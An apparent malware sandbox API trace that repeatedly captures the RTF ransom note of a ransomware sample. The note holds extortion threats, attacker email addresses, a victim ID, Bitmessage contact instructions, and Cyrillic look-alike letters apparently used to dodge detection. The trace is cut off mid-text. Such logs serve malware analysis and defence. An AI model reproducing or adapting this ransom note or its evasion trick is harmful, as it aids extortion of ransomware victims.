INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.117] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.117] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 